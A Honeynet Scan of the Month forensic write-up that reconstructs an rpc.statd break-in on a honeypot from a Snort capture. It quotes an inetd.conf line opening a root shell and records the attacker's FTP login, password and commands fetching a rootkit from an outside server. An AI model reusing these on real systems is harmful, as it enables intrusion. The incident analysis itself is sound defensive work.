|
Honeynet.org Scan of the Month
Challenge – Scan 18
Submitted by: Christopher Lee <
complexity@bigfoot.com >
The Challenge:
The Scan of the Month for Scan 15 was
to recover a deleted rootkit. Since then, people have asked us a variety of
questions about the attack, such as how did the attackers get in, who were
they, and where did they come from. Instead of us presenting the answers, we
challenge you to determine the answers yourself. You are presented with the
binary snort capture for the day of March 15. Armed with this log file, and
the knowledge that the system in question is 172.16.1.108, you should be
able to answer the following. (Note, the Honeynet Project has been quoted as
saying "The expected life expectancy of a default RedHat 6.2 server is less
then 72 hours. The last time we attempted to confirm that the system was
compromised in less then 8 hours". This is the system that was compromised
in under 8 hours.
1. The attackers
used rpc.statd attack to get into the system. What modifications did they
make to the break in process to both automate and make the process faster?
Quoting from the
CIAC advisory number K-069, rpc.statd attack is described as follows:
"The rpc.statd passes user-supplied data and without validation of this
data, a user may supply machine code to be executed with the privileges of
the rpc.statd process". This vulnerability allows the intruder to gain
access to the vulnerable host with root level access (e.g. inset the line
"9704 stream tcp nowait root /bin/sh sh -i" to the inetd.conf file and
restart the inetd process).
To understand what this cracker did, I
first ran Ethereal on the snort log file and filtered the display to show
only the traffic to and from the Linux host in question here (i.e.
172.16.1.108). The first two entries were someone scanning for
rpc-portmaper service and lpr service, but it appeared the Linux host were
not yet in production (since no reply were seen from the Linux host itself).
At 12:34:07, the third entry took place. But this was simply the Linux
host performing a WHOIS query on shell-station.com.
The next sequence of conversation took
place at 20:21:23. This time, someone from 211.185.125.124 is probing on
TCP port 111 (portmapper)… Right after the probing, an rpc.statd
buffer-overflow attack was launched against the portmapper service. What
this attacker then did on this host has been recorded into this
file. To help understand all the events took place during this attack,
I also compiled this
timeline of events for your reference (this timeline also included
events I observed from analysing the network capture with a different
filter, as stated in a later paragraph).
By examining the timestamps on the next
few packets, I noticed the following:
-
The "RPC GETPORT" query was made at 20:21:24 & its
reply was sent at 20:21:25.
-
The same attacks were launched at 20:21:25, 20:21:27 &
20:21:29.
-
The subsequent connection to this Linux host was made
at 20:21:36, and at this very second, the cracker also issued the command
“cd /; uname -a; id;”
-
After 12 minutes of inactivity, at 20:36:04, the
cracker issued the command "ftp -v ftp.home.ro". 4 seconds later (at
20:36:08), the cracker entered the login "soane" and the FTP client
prompted for the password immediately. Another 4 seconds later (at
20:36:12), the cracker enter the password "i2ttgcj1d". 3 seconds later
(at 20:36:15), the cracker issued the command "get lk.tgz". The file
transfer ended at 20:36:57, and the FTP connection was timed out at
20:40:55. 4 minutes later (at 20:44:51), the cracker closed his FTP
session by issuing the "bye" command, and in 8 seconds (at 20:44:59),
he/she proceeded to un-tar the lk.tgz. 8 seconds after the file was
decompressed (at 20:45:08), the cracker then proceed to change into the
"last" directory and execute the "./install" command 3 second thereafter
(at 20:45:02). After that, the connection to this Linux honeypot host was
terminated 3 seconds after the script displayed its final output of "*
That Was Nice Last" (at 20:45:14).
Observation #2 is interesting. Why
would this cracker launch the very same attack three times in a row, and
most importantly, with exactly two seconds between them?? Further, the
buffer-overflow attacks were initiated at the very second the "RPC GETPORT
Reply" were sent. The only logical conclusion I could come up with is that
all activities recorded in observation #1 & #2 were scripted/automated.
I resisted the temptation to conclude
observation #3 being part of the same script that automated the activities
in observation #1 & #2, since there were 7 seconds between them. However,
due to the fact that the command were issue at the very second the
connection was established, I do suspect the existence of a second script
that establish the TCP connection on port 39168 and the execution of the
aforementioned command.
Based on the delay between each
command/action in observation #4, I could say with a fair degree of
certainty that all these actions were carried out interactively by the
cracker. And he probably didn't expect the file transfer to complete as
quickly as it did (as demonstrated by the fact that he didn't return to the
terminal window until nearly 5 minutes later, when the file was transferred
4 minutes ago).
Now, to further understand what this
intruder was doing, I re-filtered the snort network capture with the IP
address of the host 211.185.125.124. Now, this is what I summarized from
the network capture:
-
At 20:21:23, the host 211.185.125.124
performed a SYN scan on TCP port 111 of all hosts in this honeynet, and
both 172.16.1.103 and 172.16.1.108 responded with a SYN-ACK.
-
At 20:21:24, the host 211.185.125.124
performed a sequence of a "RPC GETPORT Call" followed by the actual
buffer-overflow attack first to 172.16.1.103 and then 172.16.1.108 (at
20:21:25). Judging from the response of both hosts, the host 172.16.1.103
(this is probably a Solaris machine as its RPC portmapper is running on
UDP port 32773) seemed to be immune from this attack (as it actually able
to respond that mal-formed request) while the host 172.16.1.108 seemed to
be affected by it.
-
At 20:21:26, the host 211.185.125.124
performed yet another SYN scan on TCP port 111, but this time, only those
hosts that didn't respond previously were scanned.
-
At 20:21:29, to ensure the host
172.16.1.108 was indeed vulnerable, the host 211.185.125.124 launched two
more attacks identical to the one launched at 20:21:25.
-
At 20:21:32, the host 211.185.125.124
performed an identical SYN scan as one launched at 20:21:26.
-
At 20:21:36, this is when the cracker
launched the actual TCP connection to port 39168 and execute the commands
that facilitated the rest of his attack on this Linux host.
Combining the above 6 observations with
the 4 observed previously, I conclude the following:
-
This cracker's script utilizes the
following logic:
-
SYN-scan all potential targets on
port 111 and do the following to all hosts that sent back a SYN-ACK:
-
Issue a "RPC GETPORT" command to
locate the port when the portmapper is.
-
Then launched the actual
buffer-overflow attack to the portmapper service.
-
Wait 3 seconds (to provide
sufficient time for the SYN-ACK packets) and SYN-scan those hosts that
didn't respond to the first scan.
-
Wait 3 seconds and launch a couple
more buffer-overflow attacks with a 2 second interval to the host(s)
that seemed vulnerable initially. This is done to make sure this host
is indeed vulnerable.
-
Wait 3 more seconds
-
Another SYN-scan on TCP port 111 to
those hosts that didn't respond to the previous scans.
-
Wait 4 seconds this time.
-
Give up waiting, proceed to get
onto the host(s) that is vulnerable to the attack.
-
SYN-scan on TCP port 111 to those
hosts that didn't respond to the previous scan(s).
-
Wait 2 minutes and repeat step 8
for another 5 times.
-
There is probably only one script,
after all. As this very script was just busy doing bunch of
double-checking during that 7 seconds.
Therefore, the cracker did the
following to both automate and expedite the break-in process:
2. What
system/country did the badguys come in from?
According the snort capture, the attack
originated from 211.185.125.124, which belong to the IP block registered by
the Kyongsan Purim Elementary School of South Korea. This is as shown in
the WHOIS output
attached.
3. What nationality
are the badguys, and how were you able to determine this?
Well, even though the attack was
originated from South Korea, I was not fully convinced that’s where the bad
guy is…
A few questions were raised in my
mind:
-
Could this be the work of a student in this elementary
school??
It would be
extremely rare to find a grade-schooler capable of carrying out such task…
Perhaps someone else coached him/her??
-
Could this be the work of a staff working in this
school??
And it would
be silly for anyone to try to pull this one off from his workplace…
Possible, however unlikely…
-
Perhaps an outsider who had access to a machine in the
school??
Most probable
thus far, and perhaps this is the work of an intruder from cyberspace??
-
Why is this cracker downloading his/her rootkit from
ftp.home.ro (a FTP server operated by an ISP from Romania)??
Two emails
were sent as part of the
install script, this could be ultimate clue as to where the cracker is
from… The emails were sent to bidi_damm@yahoo.com & last@linuxmail.org.
Both are free web-based email service, and neither provided any sort of
directory of its members... Oh, boy, this is a dead end unless I have
access to the access log of this two mail service providers... :-(
-
What is the language being used in the installation
script??
The common
guess here would be Romanian, but I want to be sure… However, I could not
locate any “free” online translation services that would translate Romanian
to English… Mmm… Let’s try another approach… I took the phrase “Luam
Informatiile dorite” (without the quotes) and search it in Google.com
(thinking that I should be able to determine the origin of the language by
looking at the origins of site containing this phrase).
Surprise,
surprise… This phrase is Romanian in origin, as most sites returned by the
search engine registered under the .ro domain. However, I also picked up
other postings on some mailing list documenting their own accounts of being
attacked by a “foreign” rootkit. Upon further reading of those posting, I
realized that the rootkit(s) used in those other incidents were identical to
one captured here, with the email address being the only difference.
Now, the
above finding leads me to believe that while the rootkit appeared to be
Romanian in origin, it might have been “customized” by others for their own
enjoyments... However, I failed to locate any evidence of such rootkit
dated before March 15th of 2001, so these variants could be the result of
some "advanced" script kiddies who got their hands on this rootkit later
on...
Now, based on the fact that the
rootkit was stored on a Romanian FTP server and its content were Romanian in
nature, it is probably safe to say this attack was either carried out or
masterminded by a Romanian cracker.
4. What do the
answers to questions #1 and #2 tell us about the tactics the badguys are
using?
By using a script to automate the recon
of the potential target of attack, launch the attack and establish a
connection to the vulnerable host, the cracker minimizes the time he/she
spends. By launching the attack from a third host, this cracker further
prevented the exposure of his/her identity.
By having the install script of the
rootkit to send the configuration of the exploited host to two web-based
email addresses (for which you don't have to supply your real-identity for),
the cracker provided itself a reliable method of obtaining the "system
configuration of interest" without exposing his/her identity. The install
script completed the installation process by removing all the evidence of
its existence and leaves behind only the planted trojans. This further
ensure the cracker's activity stayed in stealth.
Further, since computers in elementary
schools are probably not configured for comprehensive/remote logging, this
cracker could probably wipe clean all its finger prints and foot prints on
that computer and leave the investigator and/or the sysadmin very little
clue as to what really happened. This could, after all, be the primary
reason this computer was chosen as the launchpad of the cracker's other
attacks.
If this cracker is any good, I bet the
login "soane" on ftp.home.ro is probably something that doesn't belong to
him/her, either...
The tactics I see the cracker employed
here are to minimize the chance of detection to his/her activities and to
limit the investigators' ability to identify the cracker's identity.
5. What did you
learn from this challenge?
From preparing the answer for question
1-3, I learned:
From reading the install script used by
this cracker, I noticed this cracker is only interested in the CPU and disk
usage information (apart from the IP address and the hostname). This makes
me wonder if the motive behind its attacks were simply to locate machines
with sufficient processing power and disk storage... If so, perhaps this
machine was being attacked to help the cracker to win some data-processing
project of some sort on the Internet?? And this is yet another thing I
learned:
6. How long did
this challenge take you?
Ran the Snort network capture filtered
for traffic to and from the host 172.16.1.108 and completed the analysis of
this data. This took me about an hour.
Attempted to answer the first question
and ran into more questions of my own. Decided to run the Snort network
capture filtered for traffic to and from the host 211.185.125.124 and
completed the analysis of this data. This took me about another hour.
Spent another half an hour to complete
the answer for the first question.
Answered the second question and did
some research before I could answer the third question. This took me yet
another half an hour.
Answered the fourth and the fifth
questions, this took me yet another half an hour.
Answered the bonus question, this took
me only 5 minutes. :-)
Spent yet another 90 minutes or so
reviewing the write-up, formatting it and convert all the attachments to
HTML format.
In total, I spent about 5 hours on this
challenge.
Bonus Question:
Can you recover the blackhat's
rootkit from the Snort binary log file? If so, how?
Yep, the recovery of the blackhat's
rootkit is possible with the use of network traffic sniffers like Ethereal.
First load the Snort binary log file into Ethereal, then locate one of the
packets in the FTP-DATA steam of the rootkit's (lk.tgz) download, right
click on that packet and select "Follow TCP Stream", and a new Ethereal
window will open with the content of this rootkit in it. Then click on
"Save As" to save the data in the window into a file.
Appendix:
Transcript of the hack, as captured by the Snort binary log.
The Timeline of the events took place during the hack, as captured by
the Snort binary log.
WHOIS output of the IP address 211.185.125.124, as supplied by KRNIC.
Transcript of the email delivery to bidi_damm@yahoo.com, as captured by
the Snort binary log.
Transcript of the email delivery attempt to last@linuxmail.org, as
captured by the Snort binary log.
The "install" script used and executed by the cracker, as recovered from
the rootkit "lk.tgz".
References:
Snort Home Page:
http://www.snort.org
Ethereal Home Page:
http://www.ethereal.com
The Security Advisory for Input
Validation Problem in rpc.statd:
http://www.ciac.org/ciac/bulletins/k-069.shtml
Multiple Linux Vendor rpc.statd Remote
Format String Vulnerability:
http://www.securityfocus.com/bid/1480 |
RoDI
ISOC
IWA
ARTT
RTS
WQC 2003
ISAQ 2005